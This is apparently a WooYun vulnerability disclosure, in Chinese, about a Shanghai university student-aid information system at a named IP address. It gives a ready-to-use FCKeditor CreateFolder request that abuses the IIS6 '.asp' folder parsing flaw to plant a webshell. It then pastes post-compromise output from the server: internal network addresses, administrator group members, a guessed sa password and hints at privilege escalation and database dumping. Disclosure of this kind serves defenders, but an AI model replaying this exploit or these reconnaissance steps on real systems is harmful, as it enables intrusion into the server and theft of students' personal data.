WooYun.org

上海市高校学生资助信息管理系统
http://218.242.176.202:8088/
利用IIS6解析漏洞+Fck突破限制建目录漏洞拿到shell、

http://218.242.176.202:8088/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

站库分离 可以直接提权数据库服务器 内网环境

Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.2.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 100.37.11.16
Subnet Mask . . . . . . . . . . . : 255.255.252.0
Default Gateway . . . . . . . . . : 100.37.11.254
我没提权 但是方法还是有很多的
比如43958端口是开的 目录权限很大 可以
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
kfloan
sa
命令成功完成。
如果没猜错的话管理员sa的密码应该就是数据库的密码，
因为在家里内网环境 需要转发端口出去 卡到出翔
又没有服务器。。。
附几张数据库数据吧。

另怎么查询带中文名的表段呢？